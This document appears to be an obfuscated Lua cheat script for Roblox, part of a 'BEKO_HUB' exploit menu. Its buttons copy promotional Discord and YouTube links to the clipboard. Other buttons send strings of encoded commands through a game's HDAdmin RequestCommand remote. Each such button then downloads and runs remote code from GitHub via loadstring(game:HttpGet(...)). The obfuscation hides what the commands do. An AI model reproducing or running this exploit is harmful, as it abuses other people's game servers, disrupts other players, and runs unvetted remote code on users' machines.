v24=v14:MakeTab({[v7("\115\141\136\227","\61\236\229\134\229")]=v7("\23\20\211\38\29\18\197","\84\70\150\98"),[v7("\113\84\234\132","\56\55\133\234")]="rbxassetid://4483345998",[v7("\226\36\233\79\143\15\64\251\220\58\245","\178\86\140\34\230\122\45\180")]=false});v24:AddParagraph(v7("\101\75\2\228\233\239\151\6\77\8","\38\57\103\128\128\155\228"),v7("\51\151\68\191\6\37\42\89\78","\120\229\61\204\37\19\19\107"));v24:AddButton({[v7("\210\163\89\224","\156\194\52\133")]=v7("\250\16\45\11\9\253\22\46\17\102\235\27\93\1\108\235\9\56\0","\185\95\125\82\41"),[v7("\38\222\56\172\7\222\55\171","\101\191\84\192")]=function()setclipboard("https://discord.gg/EQQHWVQFz8");end});v24:AddButton({[v7("\233\188\194\227","\167\221\175\134\185\55\37\28")]=v7("\37\27\248\24\11\103\41\1\252\20\105\123\70\24\225\15\96","\102\84\168\65\43\62"),[v7("\90\236\134\210\173\162\199\210","\25\141\234\190\207\195\164\185")]=function()setclipboard("https://youtube.com/@BEKO_HUB");end});v24:AddButton({[v7("\41\168\64\207","\103\201\45\170\33\221\62\36")]=v7("\43\157\42\67\132\58\157\56\86\235\48\242\52\91\233\45","\104\210\122\26\164"),[v7("\15\88\253\249\236\76\211\252","\76\57\145\149\142\45\176\151")]=function()setclipboard(v7("\68\51\70\141\39\136\82\44","\38\86\45\226\120\229\61\72"));end});v18:AddButton({[v7("\97\4\60\236","\47\101\81\137\167\110")]=v7("\50\255\57\117\131\162\130\41\255\62","\98\186\109\85\208\236\195"),[v7("\48\64\0\178\239\85\173\24","\115\33\108\222\141\52\206")]=function()wait(0.2 + 0);local v93={[1 + 0]=v7("\158\220\181\176\213\217\250\175\192\145\190","\165\177\218\194")};game:GetService(v7("\228\23\228\49\58\213\19\224\56\55\229\6\251\47\50\209\23","\182\114\148\93\83")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v93));wait(0.2 -0);local v93={[2 -1]=v7("\228\242\68\74\67","\223\145\44\43\49\219\172\96")};game:GetService(v7("\200\47\93\74\64\249\43\89\67\77\201\62\66\84\72\253\47","\154\74\45\38\41")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v93));wait((0.3 -0) + (319 -(273 + 46)));local v93={[(2 -0) -1]=v7("\0\31\24\68\199\56\143\69\94\82\25\89\216\50\158","\59\114\119\54\183\80\175\40")};game:GetService(v7("\148\228\27\94\175\226\10\70\163\229\56\70\169\243\10\85\163","\198\129\107\50")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v93));wait(790 -(105 + 684));local v93={[1 + 0]=v7("\227\185\124\103\63\181\180\61\39\39\236\230\41\32\46\235","\216\209\29\19\31")};game:GetService(v7("\199\189\79\127\39\196\255\105\240\188\108\103\33\213\255\122\240","\149\216\63\19\78\167\158\29")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v93));wait(2 -1);local v93={[1]=v7("\181\231\7\92\61\221\66\174\185\84\31\47\132\31\187\189","\142\143\102\40\29\176\39")};game:GetService(v7("\55\118\22\83\8\6\114\18\90\5\54\103\9\77\0\2\118","\101\19\102\63\97")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v93));wait(1);local v93={[(515 -(335 + 178)) -1]=v7("\169\79\131\170\177\7\238\178\19\215\239\163\88\187\170\19\219","\146\39\226\222\145\106\139")};game:GetService(v7("\104\233\176\83\180\89\237\180\90\185\105\248\175\77\188\93\233","\58\140\192\63\221")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v93));wait(1);local v93={[1 + 0 + 0]=v7("\253\54\240\149\160\171\59\177\210\183\240\107\163\214\177\247\107","\198\94\145\225\128")};game:GetService(v7("\132\54\29\249\232\1\245\17\179\55\62\225\238\16\245\2\179","\214\83\109\149\129\98\148\101")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v93));wait((1024 -(936 + 87)) -0);local v93={[(350 + 97) -(131 + 315)]=v7("\109\165\73\212\93\196\51\237\27\148\77\144\96\252\26\150\75\153","\86\205\40\160\125\169")};game:GetService(v7("\71\240\162\120\124\246\179\96\112\241\129\96\122\231\179\115\112","\21\149\210\20")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v93));wait(1 -0);local v93={[491 -(225 + 183 + 82)]=v7("\46\228\203\67\117\120\233\138\4\108\33\188\153\0\96\38\185\155","\21\140\170\55\85")};game:GetService(v7("\157\93\190\215\139\172\89\186\222\134\156\76\161\201\131\168\93","\207\56\206\187\226")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v93));wait(3 -2);local v93={[1]=v7("\165\163\37\224\56\50\251\235\114\167\46\102\174\251\116\172","\158\203\68\148\24\95")};game:GetService(v7("\17\177\242\78\75\32\181\246\71\70\16\160\237\80\67\36\177","\67\212\130\34\34")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v93));wait(1);local v93={[1 + 0]=v7("\75\251\243\172\49\29\246\178\238\35\66\160\166\236\35\69","\112\147\146\216\17")};game:GetService(v7("\179\117\187\233\136\115\170\241\132\116\152\241\142\98\170\226\132","\225\16\203\133")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v93));wait(973 -(800 + 172));local v93={[(1 -0) + 0]=v7("\217\36\12\221\198\143\41\77\156\210\211\125\90\153\212\214\123\89","\226\76\109\169\230")};game:GetService(v7("\233\122\199\182\210\124\214\174\222\123\228\174\212\109\214\189\222","\187\31\183\218")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v93));wait((321 -(223 + 95)) -2);local v93={[3 -2]=v7("\19\192\114\64\95\88\77\136\37\1\76\6\28\157\32\13\77\5","\40\168\19\52\127\53")};game:GetService(v7("\255\198\48\36\129\206\194\52\45\140\254\215\47\58\137\202\198","\173\163\64\72\232")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v93));wait((790 -(314 + 461)) -(10 -4));loadstring(game:HttpGet("https://raw.githubusercontent.com/rouxhaver/scripts/main/FE pet Snakes.Lua",true))();end});v18:AddButton({[v7("\89\120\197\185","\23\25\168\220\217\34")]=v7("\104\241\59\150\58\54","\59\161\114\210\127\100"),[v7("\165\12\245\251\213\128\235\220","\230\109\153\151\183\225\136\183")]=function()wait(0.2 + 0 + 0);local v94={[(629 -(48 + 341)) -(95 + 144)]=v7("\46\251\167\4\32\77\95\120\243\232\18","\21\150\200\118\80\37\127")};game:GetService(v7("\151\39\226\251\17\39\141\109\160\38\193\227\23\54\141\126\160","\197\66\146\151\120\68\236\25")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v94));wait((0.3 + 0) -0);local v94={[1]=v7("\168\43\93\46\213\225\179\43\87\124\203\230\252\36\3","\147\70\50\92\165\137")};game:GetService(v7("\249\123\2\176\227\200\127\6\185\238\248\106\29\174\235\204\123","\171\30\114\220\138")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v94));wait(0.4);local v94={[493 -(449 + 43)]=v7("\17\43\206\217\182","\42\72\166\184\196\198")};game:GetService(v7("\248\246\144\237\200\223\119\199\207\247\179\245\206\206\119\212\207","\170\147\224\129\161\188\22\179")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v94));wait(1);local v94={[1 + 0]=v7("\73\214\234\202\115\255\67\82\138\187\138\100\167\19\70\135\190\135","\114\190\139\190\83\146\38")};game:GetService(v7("\115\140\33\85\22\34\64\157\52\93\44\53\78\155\48\94\26","\33\233\81\57\127\65")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v94));wait(1 + 0);local v94={[2 -1]=v7("\37\32\220\210\194\115\45\157\146\218\42\127\137\149\211\45","\30\72\189\166\226")};game:GetService(v7("\224\209\50\184\219\215\35\160\215\208\17\160\221\198\35\179\215","\178\180\66\212")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v94));wait(766 -(386 + (1165 -(229 + 557))));local v94={[1]=v7("\0\32\26\250\27\37\30\174\8\124\75\183\13\121\73\184\13\120","\59\72\123\142")};game:GetService(v7("\126\90\111\57\68\50\77\75\122\49\126\37\67\77\126\50\72","\44\63\31\85\45\81")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v94));wait(2 -1);local v94={[50 -(17 + 32)]=v7("\191\124\55\226\14\233\113\118\160\29\178\45\102\166\30\188","\132\20\86\150\46")};game:GetService(v7("\24\189\146\143\65\85\43\172\135\135\123\66\37\170\131\132\77","\74\216\226\227\40\54")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v94));wait((1586 -(625 + 960)) + (1172 -(626 + 546)));local v94={[1]=v7("\41\168\251\67\183\127\165\186\1\165\32\243\174\3\165\39","\18\192\154\55\151")};game:GetService(v7("\150\42\67\206\216\167\46\71\199\213\151\59\92\208\208\163\42","\196\79\51\162\177")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v94));wait(1);local v94={[1661 -(864 + 796)]=v7("\35\76\26\196\56\73\30\144\43\19\77\133\42\19\74\129\45","\24\36\123\176")};game:GetService(v7("\77\72\201\52\113\124\76\205\61\124\76\89\214\42\121\120\72","\31\45\185\88\24")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v94));wait(1);local v94={[1]=v7("\230\227\181\203\159\229\184\171\224\138\142\186\239\187\236\139\134","\221\139\212\191\191\136")};game:GetService(v7("\97\15\178\6\220\185\82\30\167\14\230\174\92\24\163\13\208","\51\106\194\106\181\218")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v94));wait(1);local v94={[1 -0]=v7("\68\160\162\211\95\165\166\135\73\250\244\149\75\240\246\149","\127\200\195\167")};game:GetService(v7("\35\243\35\176\241\18\247\39\185\252\34\226\60\174\249\22\243","\113\150\83\220\152")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v94));wait(1);local v94={[1]=v7("\135\114\236\18\225\30\217\58\185\94\245\68\136\40\180\82","\188\26\141\102\193\115")};game:GetService(v7("\71\182\19\216\124\176\2\192\112\183\48\192\122\161\2\211\112","\21\211\99\180")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v94));wait(1);local v94={[1]=v7("\246\163\237\74\166\160\174\172\8\181\253\242\185\7\180\248\255\187","\205\203\140\62\134")};game:GetService(v7("\243\10\209\255\27\185\192\27\196\247\33\174\206\29\192\244\23","\161\111\161\147\114\218")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v94));wait((37 -10) -14);loadstring(game:HttpGet("https://raw.githubusercontent.com/0Ben1/fe/main/Sipder",true))();end});v13:Init();end
